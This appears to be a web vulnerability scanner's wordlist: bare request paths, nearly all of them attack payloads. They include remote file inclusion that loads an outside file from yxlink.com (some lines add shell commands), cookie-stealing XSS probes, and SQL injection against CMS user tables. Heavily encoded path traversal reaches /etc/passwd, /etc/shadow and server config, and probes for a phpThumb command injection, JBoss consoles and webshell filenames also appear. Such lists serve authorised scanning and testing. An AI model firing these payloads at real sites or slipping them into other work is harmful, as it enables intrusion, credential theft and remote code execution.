index.php?sql_debug=1
index.php?styl[top]=http://www.yxlink.com/nvs_test.txt??
index.php?subpath=http://www.yxlink.com/nvs_test.txt
index.php?template=http://www.yxlink.com/nvs_test.txt?
index.php?templates_dir=http://www.yxlink.com/nvs_test.txt?
index.php?theme=http://www.yxlink.com/nvs_test.txt
index.php?themepath=http://www.yxlink.com/nvs_test.txt?
index.php?themesdir=http://www.yxlink.com/nvs_test.txt
index.php?this_path=http://www.yxlink.com/nvs_test.txt?
index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; 
index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
index.php?topic=te'
index.php?tpl=../../httpd.ini%00
index.php?txt=http://www.yxlink.com/nvs_test.txt
index.php?up=http://www.yxlink.com/nvs_test.txt
index.php?url=http://www.yxlink.com/nvs_test.txt
index.php?url_index=http://www.yxlink.com/nvs_test.txt
index.php?user-getpass
index.php?vo=\x5C\x22><script>alert(document.cookie);</script>
index.php?w=http://www.yxlink.com/nvs_test.txt
index.php?way=http://www.yxlink.com/nvs_test.txt??????????????
index.pl
index1.php?=http://www.yxlink.com/nvs_test.txt
index1.php?inc=http://www.yxlink.com/nvs_test.txt
index1.php?inhalt=http://www.yxlink.com/nvs_test.txt
index2.php?=http://www.yxlink.com/nvs_test.txt
index2.php?content=http://www.yxlink.com/nvs_test.txt
index2.php?option=com_content&task=-99'%20UNION%20SELECT%20md5(333)%20FROM%20mos_users/*&id=24&Itemid=0
index2.php?s=http://www.yxlink.com/nvs_test.txt
index2.php?x=http://www.yxlink.com/nvs_test.txt
index_files
indexinfo.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
indexk.php?lib_path=http://www.yxlink.com/nvs_test.txt?
inexistent_file_name.inexistent0123450987.cfm
info
info.php
info.php?file=http://www.yxlink.com/nvs_test.txt
info.txt
info/
infor.asp?i%64=-1%20union%20select%201,qwbmuname,88888888888888-1,4,5,6+from+lxscms_u
inforadar/jsp/file/file_download.jsp?fileType=file&fileName=../../../../../../../../../../../../../../etc/passwd
inforadar/jsp/xml/init_sysUsers.xml
inhalt.php?dateien[news]=http://www.yxlink.com/nvs_test.txt?
ini
init.php?API_HOME_DIR=http://www.yxlink.com/nvs_test.txt
init.php?scriptpath=http://www.yxlink.com/nvs_test.txt?
initialize.php?hmail_config[includepath]=http://www.yxlink.com/nvs_test.txt&cmd=dir
initiate.php?abs_path=http://www.yxlink.com/nvs_test.txt
inlinemod.php?acuparam=>\x22><ScRiPt>alert(3333)</ScRiPt>
insert.php
install
install.php
install.php?_NE[AbsPath]=http://www.yxlink.com/nvs_test.txt
install.php?install_dir=http://www.yxlink.com/nvs_test.txt
install.php?step=7&installdir=http://www.yxlink.com/nvs_test.txt
install/
install/config.php?path=http://www.yxlink.com/nvs_test.txt
install/di.php?pathtoserverdata=http://www.yxlink.com/nvs_test.txt
install/header.tpl.php?step=b&steps[b]=cc</title><script>alert(111)</script>
install/includes/class_upgrade.php?chosenlib=http://www.yxlink.com/nvs_test.txt
install/index.php?content_php=http://www.yxlink.com/nvs_test.txt
install/index.php?insLockfile=1
install/install3.php?database=none&cabsolute_path=http://www.yxlink.com/nvs_test.txt
install_
installer
integration/shortstat/configuration.php?SPL_CFG[dirroot]=http://www.yxlink.com/nvs_test.txt?
interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://www.yxlink.com/nvs_test.txt?
interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=http://www.yxlink.com/nvs_test.txt?
interface/billing/billing_process.php?srcdir=http://www.yxlink.com/nvs_test.txt?
interface/editors/-custom.php?bField[bf_data]=http://www.yxlink.com/nvs_test.txt
interface/editors/custom.php?bField[bf_data]=http://www.yxlink.com/nvs_test.txt
interface/new/new_patient_save.php?srcdir=http://www.yxlink.com/nvs_test.txt?
intern/admin/?rootdir=http://www.yxlink.com/nvs_test.txt
intern/admin/other/backup.php?admin=1&rootdir=http://www.yxlink.com/nvs_test.txt
intern/clan/member_add.php?rootdir=http://www.yxlink.com/nvs_test.txt
intern/config/forum.php?rootdir=http://www.yxlink.com/nvs_test.txt
intern/config/key_2.php?rootdir=http://www.yxlink.com/nvs_test.txt
internal
interscan/
interscan/cgi-bin/FtpSave.dll?I'm%20Here
intranet
intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14\x22><script>alert('XSS')</script>
inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
invoker
invoker/EJBInvokerServlet
invoker/JMXInvokerServlet
invoker/invoker.jsp
ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT md5(333) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1
ioncube/loader-wizard.php?page=phpinfo
ip.inc.php?type=1&cgipath=http://www.yxlink.com/nvs_test.txt
ipchat.php?root_path=http://www.yxlink.com/nvs_test.txt
ipeer_site/?page=http://www.yxlink.com/nvs_test.txt?
isapi/testisa.dll?check1=<script>alert(document.cookie)</script>
isapi/tstisapi.dll
isx.html
item/?c-1,key-'.html
ivt/ivtserver?parm1=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
j
j.php
j2ee/servlet/SnoopServlet
jPlayer
java-plugin/
javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?errcontext=<script>alert(333)</script>
javascript/editors/fckeditor
javascript/tiny_mce
javax.faces.resource.../WEB-INF/web.xml.jsf
javax/
jboss-net/services/listServices
jbossws/services
jcms/m_5_5/m_5_5_3/import_style.jsp
jcms/m_5_7/replace/export.jsp?filename=/etc/shadow&savename=pass
jcms/m_5_7/replace/export.jsp?filename=c:/boot.ini&savename=boot
jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
jcms/setup/publishadmin.jsp
jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
jdbc
jeeadmin/jeecms/login.do
jenkins
jgb_eng_php3/cfooter.php3
jiance.php
jis/check/zx.jsp?url=http://www.baidu.com/
jis/down.jsp?pathfile=web-inf/config/dbconfig.xml
jis/update/update.jsp
jmx-console
jmx-console/
jmx-console/HtmlAdaptor
jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer
jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployer:service%3DBSHDeployer
jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type%3DServer
jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type%3DServerInfo
joinus.php?vwar_root=http://www.yxlink.com/nvs_test.txt
joinus.php?vwar_root=http://www.yxlink.com/nvs_test.txt?&cmd=ls
jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,MD5(333),pwd,1,1+from+dzp_users+where+id=1-
joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
joomla_path/components/com_articles.php?absolute_path=http://www.yxlink.com/nvs_test.txt?
jquery.min2u6.php
js
js/FCKeditor
js/Jplayer.swf?jQuery=alert&id=XSS
js/bbcodepress/bbcode-form.php?BBCODE_path=http://www.yxlink.com/nvs_test.txt
js/extjs//examples/feed-viewer/feed-proxy.php?feed=http://testasp.vulnweb.com/t/fit.txt
js/extjs/resources//charts.swf
js/flowplayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
js/jplayer/Jplayer.swf?jQuery=alert&id=XSS
js/jwplayer/player.swf?playerready=alert(document.domain)&debug=function(){alert(document.domain)}
js/plupload//plupload.flash.swf?id=\x22));}catch(e){alert(1);}//
js/swfupload//swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
js/swfupload//swfupload_f8.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
js/swfupload//swfupload_f9.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//
js/tiny_mce
js/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
js/tinymce
js/uploadify/uploadify.swf?uploadifyID=00%22%29%29;}catch%28e%29{alert%281%29;}//%28%22&movieName=%22])}catch(e){if(!window.x){window.x=1;alert(2)}}//&.swf
js/wptable-tinymce.php?ABSPATH=http://www.yxlink.com/nvs_test.txt
js/yui/uploader/assets/uploader.swf?allowedDomain=\x22})))}catch(e){alert(document.domain);}//
js/zeroclipboard/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!prompt(document.domain)//&width&height
js96777.php
jscript.php?my_ms[root]=http://www.yxlink.com/nvs_test.txt?
jscripts
jscripts/tiny_mce
jscripts/tinymce
json
jsp-examples/
jsp-examples/cal/cal2.jsp?time=\x22/><script>alert(111)</script>
jsp-examples/jsp2/el/functions.jsp?foo=<script>alert(123)</script>
jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert(123)</script>
jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert(123)</script>
jsp.php
jsp/viewer/snoop.jsp
jspSpy.php
jspdocs/
jsps/explorer/help.jsp?title=Test\x22>AAAAAAAA<script>alert(2222)</script>
jspspy.php
junk.aspx
junk.cfm
jwplayer
jwplayer/player.swf?playerready=alert(document.domain)&debug=function(){alert(document.domain)}
k
k.php
k8one.php
k8serv.php
k8team.php
kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.yxlink.com/nvs_test.txt
kernel/loadkernel.php?installPath=http://www.yxlink.com/nvs_test.txt
kill.php
kmitaadmin/kmitam/htmlcode.php?file=http://www.yxlink.com/nvs_test.txt?
kmitaadmin/kmitat/htmlcode.php?file=http://www.yxlink.com/nvs_test.txt? 
ko.php
kqx.php
ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.yxlink.com/nvs_test.txt 
l
l.php
lang/leslangues.php?fichier=http://www.yxlink.com/nvs_test.txt
lang_english/lang_main_album.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?a=
language/lang_english/lang_activity.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?a=
language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?a=
language/lang_german/lang_main_album.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?a=
languages
latest
latestposts.php?forumspath=http://www.yxlink.com/nvs_test.txt
latex.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>
launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>
layout/default/params.php?gConf[dir][layouts]=http://www.yxlink.com/nvs_test.txt?
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
lcgi/sys:/novonyx/suitespot/docs/sewse/misc/test.jse
ldap/authldap.php?includePath=http://www.yxlink.com/nvs_test.txt
ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\x5C\x22Vulnerable\x5C\x22)</script>
learnPath/include/scormExport.inc.php?includePath=http://www.yxlink.com/nvs_test.txt
lib
lib.editor.inc.php?sys_path=http://www.yxlink.com/nvs_test.txt?
lib/Loggix/Module/Calendar.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
lib/Loggix/Module/Comment.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
lib/Loggix/Module/Rss.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
lib/Loggix/Module/Trackback.php?pathToIndex=http://www.yxlink.com/nvs_test.txt
lib/action/rss.php?lib=http://www.yxlink.com/nvs_test.txt?
lib/activeutil.php?set[include_path]=http://www.yxlink.com/nvs_test.txt?
lib/addressbook.php?GLOBALS[basedir]=http://www.yxlink.com/nvs_test.txt
lib/amcharts/amcolumn/amcolumn.swf?chart_settings=<settings></settings>&chart_data=<chart><message><![CDATA[<a+href=\x22javascript:alert(1)\x22>click</a>]]></message></chart>&.swf
lib/armygame.php?libpath=http://www.yxlink.com/nvs_test.txt
lib/auth.inc.php?INIT_PATH=http://www.yxlink.com/nvs_test.txt
lib/authuser.php?root=http://www.yxlink.com/nvs_test.txt
lib/base.php?BaseCfg[BaseDir]=http://www.yxlink.com/nvs_test.txt
lib/connect.php?root=http://www.yxlink.com/nvs_test.txt
lib/connected_users.lib.php3?ChatPath=http://www.yxlink.com/nvs_test.txt
lib/db/mysql.class.php?root=http://www.yxlink.com/nvs_test.txt
lib/db/postgres.class.php?root=http://www.yxlink.com/nvs_test.txt
lib/document.class.php?INIT_PATH=http://www.yxlink.com/nvs_test.txt
lib/email.inc.php?INIT_PATH=http://www.yxlink.com/nvs_test.txt
lib/extjs//examples/feed-viewer/feed-proxy.php?feed=http://testasp.vulnweb.com/t/fit.txt
lib/extjs/resources//charts.swf
lib/fckeditor
lib/flowplayer/flowplayer.swf?config=https://s3-us-west-2.amazonaws.com/bxss/fp.js
lib/folder.class.php?INIT_PATH=http://www.yxlink.com/nvs_test.txt
lib/functions.php?DOC_ROOT=http://www.yxlink.com/nvs_test.txt
lib/googlesearch/GoogleSearch.php?APP[path][lib]=http://www.yxlink.com/nvs_test.txt?
lib/header.php?DOC_ROOT=http://www.yxlink.com/nvs_test.txt
lib/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http://testasp.vulnweb.com/t/fit.txt
lib/js/extjs/resources//charts.swf
lib/language.php?_LIB_DIR=http://www.yxlink.com/nvs_test.txt
lib/lib.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
lib/lib.repo.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
lib/lib.simplesel.php?GLOBALS[where_framework]=http://www.yxlink.com/nvs_test.txt
lib/lib.teleskill.php?GLOBALS[where_scs]=http://www.yxlink.com/nvs_test.txt
lib/live_status.lib.php?ROOT=http://www.yxlink.com/nvs_test.txt
lib/misc.php?root=http://www.yxlink.com/nvs_test.txt
lib/nl/nl.php?g_strRootDir=http://www.yxlink.com/nvs_test.txt
lib/obj/collection.class.php?GLOBALS[application][app_root]=http://www.yxlink.com/nvs_test.txt
lib/obj/content_image.class.php?GLOBALS[application][app_root]=http://www.yxlink.com/nvs_test.txt
lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
lib/pcltrace.lib.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
lib/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
lib/rs.php?rootpath=http://www.yxlink.com/nvs_test.txt
lib/selectlang.php?BBC_LANGUAGE_PATH=http://www.yxlink.com/nvs_test.txt
lib/smarty/SmartyFU.class.php?system[smarty][dir]=http://www.yxlink.com/nvs_test.txt
lib/static/header.php?set_menu=http://www.yxlink.com/nvs_test.txt
lib/tiny_mce
lib/tinymce
lib/tpl.inc.php?conf[classpath]=http://www.yxlink.com/nvs_test.txt
lib/yui/uploader/assets/uploader.swf?allowedDomain=\x22})))}catch(e){alert(document.domain);}//
libraries/comment/postComment.php?path[cb]=http://www.yxlink.com/nvs_test.txt?a=
libraries/database.php?path=http://www.yxlink.com/nvs_test.txt???
libraries/grab_globals.lib.php?inc_dir=http://www.yxlink.com/nvs_test.txt
libraries/lib-remotehost.inc.php?phpAds_geoPlugin=http://www.yxlink.com/nvs_test.txt
libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://www.yxlink.com/nvs_test.txt
libraries/tiny_mce
libraries/tinymce
library/authorize.php?login_form=http://www.yxlink.com/nvs_test.txt?
library/lib.php?root=http://www.yxlink.com/nvs_test.txt
library/translation.inc.php?GLOBALS[srcdir]=http://www.yxlink.com/nvs_test.txt?
libs
libs/db.php?path_local=http://www.yxlink.com/nvs_test.txt
libs/extjs//examples/feed-viewer/feed-proxy.php?feed=http://testasp.vulnweb.com/t/fit.txt
libs/extjs/resources//charts.swf
libs/ftp.php?path_local=http://www.yxlink.com/nvs_test.txt
libs/js/extjs//examples/feed-viewer/feed-proxy.php?feed=http://testasp.vulnweb.com/t/fit.txt
libs/js/extjs/resources//charts.swf
libs/lom.php?ETCDIR=http://www.yxlink.com/nvs_test.txt
libs/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
libsecure.php?abs_path=http://www.yxlink.com/nvs_test.txt?
license.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
license.txt
link.php?act=go&city=fujian&url='and(select/**/1/**/from(select/**/count(*),concat((select/**/concat(md5(333))/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'
link_main.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
linkadmin.php?page=http://www.yxlink.com/nvs_test.txt?
links.php?op=viewslink&amp;sid=-1/**/union/**/select/**/0,md5(333)/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=http://www.yxlink.com/nvs_test.txt
linximeng_files
linximeng_files%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/etc/passwd
linximeng_files/
linximeng_files/%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252eetc/passwd
linximeng_files/%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252e%252ewindows/win.ini
linximeng_files/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd
linximeng_files/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
linximeng_files/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini
linximeng_files/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd
linximeng_files/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows/win.ini
linximeng_files/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd
linximeng_files/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
linximeng_files/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini
linximeng_files/%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C%252e%252e\x5C/etc/passwd
linximeng_files/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd
linximeng_files/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afetc/passwd
linximeng_files/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25afwindows/win.ini
linximeng_files/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini
linximeng_files/%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C%25c0%25ae%25c0%25ae\x5C/etc/passwd
linximeng_files/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
linximeng_files/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini
linximeng_files/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd
linximeng_files/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
linximeng_files/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
linximeng_files/%5C..%2f%5C..%2f%5C..%2f%5C..%2f%5C..%2fGemfile
linximeng_files/%5C..%2f%5C..%2f%5C..%2f%5C..%2fGemfile
linximeng_files/%5C..%2f%5C..%2f%5C..%2fGemfile
linximeng_files/%5C..%2f%5C..%2fGemfile
linximeng_files/%5C..%2fGemfile
linximeng_files/%5C../%5C../%5C../%5C../%5C../Gemfile
linximeng_files/%5C../%5C../%5C../%5C../Gemfile
linximeng_files/%5C../%5C../%5C../Gemfile
linximeng_files/%5C../%5C../Gemfile
linximeng_files/%5C../Gemfile
linximeng_files/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
linximeng_files/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml?
linximeng_files/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml?
linximeng_files/%C0%AE%C0%AE/WEB-INF/web.xml?
linximeng_files/%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%aeetc/passwd
linximeng_files/%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%ae%c0%aewindows/win.ini
linximeng_files/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
linximeng_files/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
linximeng_files/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/windows/win.ini
linximeng_files/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
linximeng_files/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd
linximeng_files/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/windows/win.ini
linximeng_files/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae//etc/passwd
linximeng_files/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
linximeng_files/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
linximeng_files/%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C%c0%ae%c0%ae\x5C/etc/passwd
linximeng_files/%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%afetc%c0%af%c0%af%c0%afpasswd
linximeng_files/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
linximeng_files/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
linximeng_files/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd
